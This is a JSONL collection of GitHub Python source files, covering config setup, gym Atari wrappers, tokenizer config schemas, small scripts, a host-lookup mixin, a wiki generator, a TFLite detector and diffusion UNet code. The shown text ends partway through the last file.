+{"seq_id":"30285600311","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : lhr (airhenry@gmail.com)\n# @Link : http://about.me/air.henry\n\n\nfrom general import gs\nlog=gs.get_logger(__name__,debug=False)\n\nfrom general.gs import cfg,types\nPortType = types.Integer(1, 65535)\n\nOPTS = [\n cfg.StrOpt('redis_server',\n default='localhost',\n help='redis server to connect to '),\n cfg.Opt('redis_port',\n type=PortType,\n default=6379,\n help='redis port number to connect to'),\n cfg.StrOpt('mongo_server',\n default='localhost',\n help='mongo server to connect to '),\n cfg.Opt('mongo_port',\n type=PortType,\n default=27017,\n help='mongo port number to connect to'),\n ]\n\n\ngs.init(__file__,OPTS)\n\n# log=gs.get_logger(__name__,debug=gs.CONF.debug)\n\nlog.debug(\"gs loaded, root is \"+gs.CONF.root_package_name)\n","repo_name":"lhrkkk/general","sub_path":"general/init_gs.py","file_name":"init_gs.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14254706753","text":"import os\nimport pandas as pd\nimport numpy as np\nimport json\nfrom objects import Vertiport, Pad, Aircraft\nfrom copy import deepcopy\n\n\ndef create_vertiport(file_name: str) -> (list, int):\n \"\"\"\n This function creates vertiport objects alongside their pads.\n\n Args:\n file_name (str): vertiport file name that contains its location, pads and number of stands.\n\n Returns:\n vertiport_objects (list): list of built vertiport objects.\n last_id (int): last objects id, to be used for creating other objects.\n\n \"\"\"\n i = 1\n root_path = os.getcwd() + f\"\\\\{file_name}.xlsx\"\n excel_data = pd.ExcelFile(root_path)\n sheet_names = excel_data.sheet_names\n excel_data = pd.read_excel(root_path, sheet_name=sheet_names[0])\n data_dict = excel_data.to_dict(orient='dict')\n vertiport_objects = []\n vertiport_created = False\n for index in data_dict['Name']:\n if type(data_dict['Name'][index]) == str:\n if vertiport_created:\n vertiport_obj.pads = pads\n vertiport_objects.append(deepcopy(vertiport_obj))\n vertiport_obj = Vertiport(i, [], [], json.loads(data_dict['Position'][index]), data_dict['Name'][index], data_dict['Capacity'][index])\n vertiport_created = True\n pads = []\n i += 1\n if data_dict['Pad'][index]:\n pad_obj = Pad(i, data_dict['Pad'][index] if type(data_dict['Pad'][index]) == str else 'pad with no name')\n pads.append(pad_obj)\n i += 1\n elif np.isnan(data_dict['Name'][index]):\n if data_dict['Pad'][index]:\n pad_obj = Pad(i, data_dict['Pad'][index] if type(data_dict['Pad'][index]) == str else 'pad with no name')\n pads.append(pad_obj)\n i += 1\n vertiport_obj.pads = pads\n # vertiport_obj.aircrafts = aircrafts\n vertiport_objects.append(deepcopy(vertiport_obj))\n last_id = i\n return vertiport_objects, last_id\n\n\ndef create_aircrafts(aircraft_schedule_data: dict, last_id: int) -> (list, int):\n \"\"\"\n This function creates aircraft objects demand_schedule_data\n\n Args:\n aircraft_schedule_data (dict): a dictionary that contains every aircraft's \n arrival time.\n last_id (int): previous last objects id, to be used for creating other objects.\n\n Returns:\n demands (list): list of built aircraft objects.\n last_id (int): last objects id, to be used for creating other objects.\n\n \"\"\"\n aircrafts = []\n for i in range(len(aircraft_schedule_data['aircraft_start_time'])):\n aircrafts.append(Aircraft(last_id, 'scheduled', [], aircraft_schedule_data['aircraft_start_time'][i]))\n last_id += 1\n return aircrafts, last_id","repo_name":"moahmmadalizade91/max_time_on_vertiport","sub_path":"create_objects.py","file_name":"create_objects.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"38916287873","text":"\"\"\"\n Converting individual lives in the game into separate episodes. In\n general, an episode contains all the steps from the beginning of the game\n until the \"Game over\" screen appears?, which can last for thousands of\n game steps (observations and actions). Usually, in arcade games, the\n player is given several lives, which provide several attempts in the\n game. This transformation splits a full episode into individual small\n episodes for every life that a player has. Not all games support this\n feature (for example, Pong doesn't), but for the supported environments,\n it usually helps to speed up convergence as our episodes become shorter.\n In the beginning of the game, performing a random amount (up to 30) of\n no-op actions. This should stabilize training, but there is no proper\n explanation why it is the case.\n Making an action decision every K steps, where K is usually 4 or 3. On\n intermediate frames, the chosen action is simply repeated. This allows\n training to speed up significantly, as processing every frame with a\n neural network is quite a demanding operation, but the difference\n between consequent frames is usually minor.\n Taking the maximum of every pixel in the last two frames and using it\n as an observation. Some Atari games have a flickering effect, which is\n due to the platform's limitation (Atari has a limited amount of sprites\n that can be shown on a single frame). For a human eye, such quick\n changes are not visible, but they can confuse neural networks.\n Pressing FIRE in the beginning of the game. Some games (including\n Pong and Breakout) require a user to press the FIRE button to start the\n game. In theory, it's possible for a neural network to learn to press FIRE\n itself, but it will require much more episodes to be played. So, we press\n FIRE in the wrapper.\n Scaling every frame down from 210 × 160, with three color frames, into\n a single-color 84 × 84 image. Different approaches are possible. For\n example, the DeepMind paper describes this transformation as taking\n the Y-color channel from the YCbCr color space and then rescaling the\n full image to an 84 × 84 resolution. Some other researchers do grayscale\n transformation, cropping non-relevant parts of the image and then\n scaling down. In the Baselines repository (and in the following example\n code), the latter approach is used.\n Stacking several (usually four) subsequent frames together to give the\n network the information about the dynamics of the game's objects.\n Clipping the reward to −1, 0, and 1 values. The obtained score can vary\n wildly among the games. For example, in Pong you get a score of 1 for\n every ball that your opponent passes behind you. However, in some\n games, like KungFu, you get a reward of 100 for every enemy killed.\n This spread in reward values makes our loss have completely different\n scales between the games, which makes it harder to find common\n hyperparameters for a set of games. To fix this, reward just gets clipped\n to the range [−1...1].\n Converting observations from unsigned bytes to float32 values. The\n screen obtained from the emulator is encoded as a tensor of bytes with\n values from 0 to 255, which is not the best representation for a neural\n network. So, we need to convert the image into floats and rescale the\n values to the range [0.0…1.0].\n\"\"\"\n\nimport cv2\nimport gym\nimport gym.spaces\nimport numpy as np\nimport collections\n\n\nclass FireResetEnv(gym.Wrapper):\n def __init__(self, env=None):\n super(FireResetEnv, self).__init__(env)\n assert env.unwrapped.get_action_meanings()[1] == 'FIRE'\n assert len(env.unwrapped.get_action_meanings()) >= 3\n\n def step(self, action):\n return self.env.step(action)\n\n def reset(self, **kwargs):\n self.env.reset()\n obs, _, done, _ = self.env.step(1)\n if done:\n self.env.reset()\n obs, _, done, _ = self.env.step(2)\n if done:\n self.env.reset()\n return obs\n\n\nclass MaxAndSkipEnv(gym.Wrapper):\n def __init__(self, env=None, skip=4):\n \"\"\"\n Return only every skip frame\n :param env:\n :param skip:\n \"\"\"\n super(MaxAndSkipEnv, self).__init__(env)\n self._obs_buffer = collections.deque(maxlen=2)\n self._skip = skip\n\n def step(self, action):\n total_reward = 0.0\n done = None\n info = None\n for _ in range(self._skip):\n obs, reward, done, info = self.env.step(action)\n self._obs_buffer.append(obs)\n total_reward += reward\n if done:\n break\n max_frame = np.max(np.stack(self._obs_buffer), axis=0)\n return max_frame, total_reward, done, info\n\n def _reset(self):\n self._obs_buffer.clear()\n obs = self.env.reset()\n self._obs_buffer.append(obs)\n return obs\n\n\nclass ProcessFrame84(gym.ObservationWrapper):\n \"\"\"\n The goal of this wrapper is to convert input observations from the emulator,\n which normally has a resolution of 210 × 160 pixels with RGB color\n channels, to a grayscale 84 × 84 image. It does this using a colorimetric\n grayscale conversion (which is closer to human color perception than a\n simple averaging of color channels), resizing the image and cropping the top\n and bottom parts of the result.\n \"\"\"\n def __init__(self, env=None):\n super(ProcessFrame84, self).__init__(env)\n self.observation_space = gym.spaces.Box(low=0, high=255, shape=(84, 84, 1),\n dtype=np.uint8)\n\n def observation(self, observation):\n return ProcessFrame84.process(observation)\n\n @staticmethod\n def process(frame):\n if frame.size == 210 * 160 * 3:\n img = np.reshape(frame, (210, 160, 3)).astype(np.float32)\n else:\n assert False, \"Unknown resolution\"\n img = img[:, :, 0] * 0.299 + img[:, :, 1] * 0.587 \\\n + img[:, :, 2] * .114\n resized_screen = cv2.resize(img, (84, 110), interpolation=cv2.INTER_AREA)\n x_t = resized_screen[18:102, :]\n x_t = np.reshape(x_t, [84, 84, 1])\n return x_t.astype(np.uint8)\n\n\nclass BufferWrapper(gym.ObservationWrapper):\n \"\"\"\n This class creates a stack of subsequent frames along the first dimension and\n returns them as an observation. The purpose is to give the network an idea\n about the dynamics of the objects, such as the speed and direction of the ball\n in Pong or how enemies are moving. This is very important information,\n which it is not possible to obtain from a single image.\n \"\"\"\n def __init__(self, env, n_steps, dtype=np.float32):\n super(BufferWrapper, self).__init__(env)\n self.dtype = dtype\n self.buffer = np.zeros_like(self.observation_space.low, dtype=self.dtype)\n old_space = env.observation_space\n self.observation_space = gym.spaces.Box(old_space.low.repeat(n_steps, axis=0),\n old_space.high.repeat(n_steps, axis=0),\n dtype=dtype)\n\n def reset(self, **kwargs):\n self.buffer = np.zeros_like(self.observation_space.low, dtype=self.dtype)\n return self.observation(self.env.reset())\n\n def observation(self, observation):\n self.buffer[:-1] = self.buffer[1:]\n self.buffer[-1] = observation\n return self.buffer\n\n\nclass ImageToPyTorch(gym.ObservationWrapper):\n \"\"\"\n This simple wrapper changes the shape of the observation from HWC to the\n CHW format required by PyTorch. The input shape of the tensor has a color\n channel as the last dimension, but PyTorch's convolution layers assume the\n color channel to be the first dimension.\n\n \"\"\"\n def __init__(self, env):\n super(ImageToPyTorch, self).__init__(env)\n old_shape = self.observation_space.shape\n self.observation_space = gym.spaces.Box(low=0.0,\n high=1.0,\n shape=(old_shape[-1],\n old_shape[0],\n old_shape[1]),\n dtype=np.float32)\n\n def observation(self, observation):\n return np.moveaxis(observation, 2, 0)\n\n\nclass ScaledFloatFrame(gym.ObservationWrapper):\n def observation(self, observation):\n return np.array(observation).astype(np.float32) / 255.0\n\n\ndef make_env(env_name):\n env = gym.make(env_name)\n env = MaxAndSkipEnv(env)\n env = FireResetEnv(env)\n env = ProcessFrame84(env)\n env = ImageToPyTorch(env)\n env = BufferWrapper(env, 4)\n return ScaledFloatFrame(env)","repo_name":"GuyRobot/RL-Python","sub_path":"DeepQLearning/Wrapper.py","file_name":"Wrapper.py","file_ext":"py","file_size_in_byte":9092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"10787821259","text":"from hydra.core.config_store import ConfigStore\nfrom omegaconf import MISSING\nfrom pydantic import validator\nfrom pydantic.dataclasses import dataclass\n\n\n@dataclass\nclass DecoderConfig:\n _target_: str = MISSING\n\n\n@dataclass\nclass BPEDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.BPEDecoder\"\n suffix: str = \"\"\n\n\n@dataclass\nclass ByteLevelDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.ByteLevel\"\n\n\n@dataclass\nclass CTCDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.CTC\"\n pad_token: str = \"\"\n word_delimiter_token: str = \"|\"\n cleanup: bool = True\n\n\n@dataclass\nclass MetaspaceDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.Metaspace\"\n replacement: str = \"_\"\n add_prefix_space: bool = True\n\n @validator(\"replacement\")\n def validate_replacement(cls, replacement: str) -> str:\n if len(replacement) > 1:\n raise ValueError(f\"len(replacement) must be 1, got: {len(replacement)}\")\n return replacement\n\n\n@dataclass\nclass WordPieceDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.Metaspace\"\n prefix: str = \"##\"\n cleanup: bool = True\n\n\ndef setup_config() -> None:\n cs = ConfigStore.instance()\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"bpe_decoder_schema\",\n node=BPEDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"byte_level_decoder_schema\",\n node=ByteLevelDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"ctc_decoder_schema\",\n node=CTCDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"metaspace_decoder_schema\",\n node=MetaspaceDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"word_piece_decoder_schema\",\n node=WordPieceDecoderConfig,\n )\n","repo_name":"emkademy/cybulde-data-preparation","sub_path":"cybulde/config_schemas/tokenization/decoder_schema.py","file_name":"decoder_schema.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"5447816175","text":"from fpdf import FPDF\nimport glob\nfrom pathlib import Path\n\nfiles = glob.glob(\"file/*.txt\")\npdf = FPDF(orientation=\"P\", unit=\"mm\", format=\"A4\")\n\nfor file in files:\n title = Path(file).stem.title()\n pdf.add_page()\n pdf.set_font(family=\"Times\", style=\"B\", size=20)\n pdf.cell(w=150, h=7, txt=title)\n pdf.ln(10)\n with open(file, \"r\") as content:\n content = content.read()\n pdf.set_font(family=\"Times\", size=12)\n pdf.multi_cell(w=180, h=6, txt=content, align=\"J\")\n\npdf.output(\"studpro.pdf\")","repo_name":"muhlisasri/app4-invoice-generation","sub_path":"studentproject/studpro.py","file_name":"studpro.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"113640332","text":"import sys\nsys.setrecursionlimit(10 ** 9)\ninput = sys.stdin.readline\n\ndef DFS(v):\n for i in tree[v]:\n if visited[i] == 0:\n visited[i] = v\n DFS(i)\n\nn = int(input())\ntree = [[] for _ in range(n + 1)]\nfor _ in range(n - 1):\n parent, child = map(int, input().split())\n tree[parent].append(child)\n tree[child].append(parent)\nvisited = [0] * (n + 1)\n\nDFS(1)\nfor parent in visited[2:]:\n print(parent)","repo_name":"cosmos-1885/Algorithm","sub_path":"알고리즘 분류/그래프 탐색/No.11725.py","file_name":"No.11725.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30111772618","text":"import csv\nimport json\n\nwith open(\"C:/Temp/students.json\", \"r\", encoding=\"utf-8\") as fin, \\\n open(\"C:/Temp/students_data.csv\", \"w\", encoding=\"utf-8\", newline=\"\") as fout:\n \n students = json.load(fin)\n flds=[\"name\",\"phone\"]\n data = [dict(zip(flds,[s[flds[0]],s[flds[1]]])) for s in students if s[\"age\"]>=18 and s[\"progress\"]>=75]\n \n writer = csv.DictWriter(fout, fieldnames=flds)\n writer.writeheader()\n writer.writerows(sorted(data, key=lambda x: x[flds[0]]))","repo_name":"vepankin/python_stepik","sub_path":"json_students_data.py","file_name":"json_students_data.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26527207627","text":"# -*- coding: utf-8 -*-\nfrom gcloud.conf import settings\nfrom gcloud.utils.ip import get_ip_by_regex, extract_ip_from_ip_str\nfrom pipeline_plugins.base.utils.inject import supplier_account_for_business\nfrom pipeline_plugins.components.collections.sites.open.cc.base import cc_get_host_by_innerip_with_ipv6\nfrom pipeline_plugins.components.collections.sites.open.cc.ipv6_utils import (\n cc_get_host_by_innerip_with_ipv6_across_business,\n)\nfrom pipeline_plugins.components.utils.sites.open.utils import get_biz_ip_from_frontend, get_biz_ip_from_frontend_hybrid\n\n\nclass GetJobTargetServerMixin(object):\n def get_target_server_ipv6(self, executor, biz_cc_id, ip_str, logger_handle, data):\n supplier_account = supplier_account_for_business(biz_cc_id)\n logger_handle.info(\"[get_target_server_ipv6] start search this ip:{}\".format(ip_str))\n host_result = cc_get_host_by_innerip_with_ipv6(executor, biz_cc_id, ip_str, supplier_account)\n logger_handle.info(\n \"[get_target_server_ipv6] start search this ip: {} end, result={}\".format(ip_str, host_result)\n )\n if not host_result[\"result\"]:\n data.outputs.ex_data = \"ip查询失败,请检查ip配置是否正确,ip_list={}\".format(host_result.get(\"message\"))\n return False, {}\n\n return True, {\"host_id_list\": [int(host[\"bk_host_id\"]) for host in host_result[\"data\"]]}\n\n def get_target_server_ipv6_across_business(self, executor, biz_cc_id, ip_str, logger_handle, data):\n \"\"\"\n step 1: 去本业务查这些ip,得到两个列表,本业务查询到的host, 本业务查不到的ip列表\n step 2: 对于本业务查不到的host, 去全业务查询,查不到的话则报错,将查到的host_id 与 本业务的 host_id 进行合并\n \"\"\"\n logger_handle.info(\"[get_target_server_ipv6_across_business] start search ip, ip_str={}\".format(ip_str))\n supplier_account = supplier_account_for_business(biz_cc_id)\n # 去本业务查\n try:\n (\n host_list,\n ipv4_not_find_list,\n ipv4_with_cloud_not_find_list,\n ipv6_not_find_list,\n ipv6_with_cloud_not_find_list,\n ) = cc_get_host_by_innerip_with_ipv6_across_business(executor, biz_cc_id, ip_str, supplier_account)\n except Exception as e:\n logger_handle.exception(\n f\"[get_target_server_ipv6_across_business] call \"\n f\"cc_get_host_by_innerip_with_ipv6_across_business error: {e}\"\n )\n data.outputs.ex_data = \"ip查询失败,请检查ip配置是否正确:{}\".format(e)\n return False, {}\n\n ip_not_find_str = \",\".join(\n ipv4_not_find_list + ipv6_not_find_list + ipv4_with_cloud_not_find_list + ipv6_with_cloud_not_find_list\n )\n logger_handle.info(\n \"[get_target_server_ipv6_across_business] not find this ip, ip_not_find_str={}\".format(ip_not_find_str)\n )\n # 剩下的ip去全业务查\n host_result = cc_get_host_by_innerip_with_ipv6(\n executor, None, ip_not_find_str, supplier_account, is_biz_set=True\n )\n logger_handle.info(\n \"[get_target_server_ipv6_across_business] start search this ip:{}, result:{}\".format(\n ip_not_find_str, host_list\n )\n )\n if not host_result[\"result\"]:\n data.outputs.ex_data = \"ip查询失败,请检查ip配置是否正确,ip_list={}\".format(host_result.get(\"message\"))\n return False, {}\n host_data = host_result[\"data\"] + host_list\n return True, {\"host_id_list\": [int(host[\"bk_host_id\"]) for host in host_data]}\n\n def get_target_server(\n self,\n executor,\n biz_cc_id,\n data,\n ip_str,\n logger_handle,\n ip_is_exist=False,\n is_across=False,\n ignore_ex_data=False,\n ):\n if settings.ENABLE_IPV6:\n if is_across:\n return self.get_target_server_ipv6_across_business(executor, biz_cc_id, ip_str, logger_handle, data)\n return self.get_target_server_ipv6(executor, biz_cc_id, ip_str, logger_handle, data)\n # 获取IP\n clean_result, ip_list = get_biz_ip_from_frontend(\n ip_str,\n executor,\n biz_cc_id,\n data,\n logger_handle=logger_handle,\n is_across=is_across,\n ip_is_exist=ip_is_exist,\n ignore_ex_data=ignore_ex_data,\n )\n if not clean_result:\n return False, {}\n\n return True, {\"ip_list\": ip_list}\n\n def get_target_server_hybrid(self, executor, biz_cc_id, data, ip_str, logger_handle):\n if settings.ENABLE_IPV6:\n return self.get_target_server_ipv6_across_business(executor, biz_cc_id, ip_str, logger_handle, data)\n # 获取IP\n clean_result, ip_list = get_biz_ip_from_frontend_hybrid(executor, ip_str, biz_cc_id, data)\n if not clean_result:\n return False, {}\n\n return True, {\"ip_list\": ip_list}\n\n def get_target_server_biz_set(\n self, executor, ip_table, supplier_account, logger_handle, ip_key=\"ip\", need_build_ip=True\n ):\n def build_ip_str_from_table():\n ip_list = []\n # 第二步 分析表格, 得到 ipv6, host_id,ipv4, 三种字符串,并连接成字符串\n for _ip in ip_table:\n ipv6_list, ipv4_list, host_id_list, *_ = extract_ip_from_ip_str(_ip[ip_key]) # noqa\n host_id_list = [str(host_id) for host_id in host_id_list]\n ip_list.extend(\n [\n *[\"{}:[{}]\".format(_ip.get(\"bk_cloud_id\", 0), item) for item in ipv6_list],\n *host_id_list,\n *[\"{}:{}\".format(_ip.get(\"bk_cloud_id\", 0), item) for item in ipv4_list],\n ]\n )\n return \",\".join(ip_list)\n\n if settings.ENABLE_IPV6:\n # 第一步 查询这个业务集下所有的业务id, 得到bk_biz_ids\n ip_str = ip_table\n # 在业务集的执行方案中,可能不需要额外处理ip,这种情况直接透传就好\n if need_build_ip:\n ip_str = build_ip_str_from_table()\n logger_handle.info(\"[get_target_server_biz_set] build ip_str, ip_str is {}\".format(ip_str))\n host_result = cc_get_host_by_innerip_with_ipv6(executor, None, ip_str, supplier_account, is_biz_set=True)\n logger_handle.info(\"[get_target_server_biz_set] search ip end, host_result is {}\".format(host_result))\n if not host_result[\"result\"]:\n return False, {}\n return True, {\"host_id_list\": [int(host[\"bk_host_id\"]) for host in host_result[\"data\"]]}\n\n # 拼装ip_list, bk_cloud_id为空则值为0\n ip_list = [\n {\"ip\": ip, \"bk_cloud_id\": int(_ip[\"bk_cloud_id\"]) if str(_ip[\"bk_cloud_id\"]) else 0}\n for _ip in ip_table\n for ip in get_ip_by_regex(_ip[ip_key])\n ]\n\n return True, {\"ip_list\": ip_list}\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"pipeline_plugins/components/collections/sites/open/job/ipv6_base.py","file_name":"ipv6_base.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"}
+{"seq_id":"70139779690","text":"from conf import PROJECT_ROOT_DIR\nimport os\nimport pandas as pd\nimport numpy as np\nimport re\n\nfrom git_status import get_repo_list\n\n\ndef get_wiki_status_color(input_text):\n if input_text is None or input_text == 'inactive':\n result_text = \":heavy_multiplication_x:\"\n else:\n result_text = \":heavy_check_mark:\"\n return '{}'.format(result_text)\n\n\ndef get_wiki_rating(input_rating):\n result_text = ''\n if input_rating is not None and not np.isnan(input_rating):\n rating = int(input_rating)\n result_text = ':star:x{}'.format(rating)\n return '{}'.format(result_text)\n\n\ndef generate_wiki_per_category(output_path, update_readme: bool = True):\n \"\"\"\n\n :param update_readme:\n :param output_path:\n \"\"\"\n repo_df = get_repo_list()\n for category in repo_df['category'].unique():\n category_df = repo_df[repo_df['category'] == category].copy()\n url_md_list = []\n for idx, irow in category_df[['name', 'url']].iterrows():\n url_md_list.append('[{}]({})'.format(irow['name'], irow['url']))\n\n formatted_df = pd.DataFrame({\n 'repo': url_md_list,\n 'comment': category_df['comment'].apply(lambda x: '{}'.format(x)),\n 'created_at': category_df['created_at'].apply(lambda x: '{}'.format(x)),\n 'last_commit': category_df['last_commit'].apply(lambda x: '{}'.format(x)),\n 'star_count': category_df['star_count'].apply(lambda x: '{}'.format(x)),\n 'repo_status': category_df['repo_status'],\n 'rating': category_df['rating']\n })\n # add color for the status\n formatted_df = formatted_df.sort_values(by=['rating', 'star_count'], ascending=False).reset_index(drop=True)\n formatted_df['repo_status'] = formatted_df['repo_status'].apply(lambda x: get_wiki_status_color(x))\n formatted_df['rating'] = formatted_df['rating'].apply(lambda x: get_wiki_rating(x))\n formatted_df.columns = ['{}'.format(x) for x in formatted_df.columns]\n\n clean_category_name = category.lower().replace(' ', '_')\n output_path_full = os.path.join(output_path, '{}.md'.format(clean_category_name))\n with open(output_path_full, 'w') as f:\n f.write(formatted_df.to_markdown(index=False))\n print('wiki generated in [{}]'.format(output_path_full))\n\n if update_readme:\n check_str = '[PLACEHOLDER_START:{}]'.format(clean_category_name)\n with open(os.path.join(PROJECT_ROOT_DIR, 'README.md')) as f:\n all_read_me = f.read()\n if check_str not in all_read_me:\n print(f'section {check_str} not found')\n continue\n\n # only display top 5, then expandable for extra 5\n with open(os.path.join(PROJECT_ROOT_DIR, 'README.md'), 'w') as f:\n\n table_str = formatted_df.iloc[:15].to_markdown(index=False)\n new_str = f\" \\n\"\n new_str += table_str\n new_str += f\"\"\n\n search_start = re.escape(''.format(clean_category_name))\n search_end = re.escape(''.format(clean_category_name))\n pattern_s = re.compile(r'{}.*?{}'.format(search_start, search_end), re.DOTALL)\n write_str = re.sub(pattern_s, new_str, all_read_me)\n f.write(write_str)\n\n\nif __name__ == '__main__':\n local_path = os.path.join(PROJECT_ROOT_DIR, 'generated_wiki')\n generate_wiki_per_category(local_path)\n","repo_name":"firmai/financial-machine-learning","sub_path":"wiki_gen.py","file_name":"wiki_gen.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":5070,"dataset":"github-code","pt":"53"}
+{"seq_id":"622273703","text":"import numpy as np\nimport tensorflow as tf\nimport cv2\n\nfrom object_detector_detection_api import ObjectDetectorDetectionAPI, \\\n PATH_TO_LABELS, NUM_CLASSES\n\n\nclass ObjectDetectorLite(ObjectDetectorDetectionAPI):\n def __init__(self, model_path='converted_shopmodel3.tflite'):\n \"\"\"\n Builds Tensorflow graph, load model and labels\n \"\"\"\n\n # Load lebel_map\n self._load_label(PATH_TO_LABELS, NUM_CLASSES, use_disp_name=True)\n\n # Define lite graph and Load Tensorflow Lite model into memory\n self.interpreter = tf.lite.Interpreter(\n model_path=model_path)\n self.interpreter.allocate_tensors()\n self.input_details = self.interpreter.get_input_details()\n self.output_details = self.interpreter.get_output_details()\n\n def detect(self, image, threshold=0.1):\n \"\"\"\n Predicts person in frame with threshold level of confidence\n Returns list with top-left, bottom-right coordinates and list with labels, confidence in %\n \"\"\"\n\n # Resize and normalize image for network input\n frame = cv2.resize(image, (64, 64))\n frame = np.expand_dims(frame, axis=0)\n frame = (2.0 / 255.0) * frame - 1.0\n frame = frame.astype('float32')\n\n # run model\n self.interpreter.set_tensor(self.input_details[0]['index'], frame)\n self.interpreter.invoke()\n\n # get results\n boxes = self.interpreter.get_tensor(\n self.output_details[0]['index'])\n print(boxes)\n classes = self.interpreter.get_tensor(\n self.output_details[1]['index'])\n scores = self.interpreter.get_tensor(\n self.output_details[2]['index'])\n num = self.interpreter.get_tensor(\n self.output_details[3]['index'])\n\n # Find detected boxes coordinates\n return self._boxes_coordinates(image,\n np.squeeze(boxes[0]),\n np.squeeze(classes[0]+1).astype(np.int32),\n np.squeeze(scores[0]),\n min_score_thresh=threshold)\n\n def close(self):\n pass\n\n\nif __name__ == '__main__':\n detector = ObjectDetectorLite()\n\n image = cv2.cvtColor(cv2.imread('dog.jpg'), cv2.COLOR_BGR2RGB)\n\n result = detector.detect(image, 0.4)\n print(result)\n\n for obj in result:\n print('coordinates: {} {}. class: \"{}\". confidence: {:.2f}'.\n format(obj[0], obj[1], obj[3], obj[2]))\n\n cv2.rectangle(image, obj[0], obj[1], (0, 255, 0), 2)\n cv2.putText(image, '{}: {:.2f}'.format(obj[3], obj[2]),\n (obj[0][0], obj[0][1] - 5),\n cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0), 2)\n\n cv2.imwrite('r1.jpg', cv2.cvtColor(image, cv2.COLOR_RGB2BGR))\n\n detector.close()\n","repo_name":"Pixel-Pi/CVProject","sub_path":"mobile_detector/object_detector_detection_api_lite.py","file_name":"object_detector_detection_api_lite.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"12168140958","text":"import math\nimport torch\nfrom torch import nn\n\nclass Block(nn.Module):\n def __init__(self, in_ch, out_ch, time_emb_dim, up=False):\n super().__init__()\n self.time_mlp = nn.Linear(time_emb_dim, out_ch)\n if up:\n self.conv1 = nn.Conv2d(2 * in_ch, out_ch, 3, padding=1)\n self.transform = nn.ConvTranspose2d(out_ch, out_ch, 4, 2, 1)\n else:\n self.conv1 = nn.Conv2d(in_ch, out_ch, 3, padding=1)\n self.transform = nn.Conv2d(out_ch, out_ch, 4, 2, 1)\n self.conv2 = nn.Conv2d(out_ch, out_ch, 3, padding=1)\n self.bnorm1 = nn.BatchNorm2d(out_ch)\n self.bnorm2 = nn.BatchNorm2d(out_ch)\n self.relu = nn.ReLU()\n\n def forward(self, x, t):\n h = self.bnorm1(self.relu(self.conv1(x)))\n time_emb = self.relu(self.time_mlp(t))\n time_emb = time_emb[(...,) + (None,) * 2]\n h = h + time_emb\n h = self.bnorm2(self.relu(self.conv2(h)))\n return self.transform(h)\n\n\nclass SinusoidalPositionEmbeddings(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.dim = dim\n\n def forward(self, time):\n device = time.device\n half_dim = self.dim // 2\n embeddings = math.log(10000) / (half_dim - 1)\n embeddings = torch.exp(torch.arange(half_dim, device=device) * -embeddings)\n embeddings = time[:, None] * embeddings[None, :]\n embeddings = torch.cat((embeddings.sin(), embeddings.cos()), dim=-1)\n # TODO: Double check the ordering here\n return embeddings\n\n\nclass SimpleUnet(nn.Module):\n def __init__(self):\n super().__init__()\n image_channels = 3\n down_channels = (64, 128, 256, 512, 1024)\n up_channels = (1024, 512, 256, 128, 64)\n out_dim = 3\n time_emb_dim = 32\n\n self.time_mlp = nn.Sequential(\n SinusoidalPositionEmbeddings(time_emb_dim),\n nn.Linear(time_emb_dim, time_emb_dim),\n nn.ReLU(),\n )\n self.conv0 = nn.Conv2d(image_channels, down_channels[0], 3, padding=1)\n self.downs = nn.ModuleList(\n [\n Block(down_channels[i], down_channels[i + 1], time_emb_dim)\n for i in range(len(down_channels) - 1)\n ]\n )\n self.ups = nn.ModuleList(\n [\n Block(up_channels[i], up_channels[i + 1], time_emb_dim, up=True)\n for i in range(len(up_channels) - 1)\n ]\n )\n self.output = nn.Conv2d(up_channels[-1], out_dim, 1)\n\n def forward(self, x, timestep):\n t = self.time_mlp(timestep)\n x = self.conv0(x)\n residual_inputs = []\n for down in self.downs:\n x = down(x, t)\n residual_inputs.append(x)\n for up in self.ups:\n residual_x = residual_inputs.pop()\n x = torch.cat((x, residual_x), dim=1)\n x = up(x, t)\n return self.output(x)\n\n\nclass UNet(nn.Module):\n def __init__(self, in_channels=1, out_channels=1):\n super().__init__()\n self.down_layers = torch.nn.ModuleList(\n [\n nn.Conv2d(in_channels, 32, kernel_size=5, padding=2),\n nn.Conv2d(32, 64, kernel_size=5, padding=2),\n nn.Conv2d(64, 64, kernel_size=5, padding=2),\n ]\n )\n self.up_layers = torch.nn.ModuleList(\n [\n nn.Conv2d(64, 64, kernel_size=5, padding=2),\n 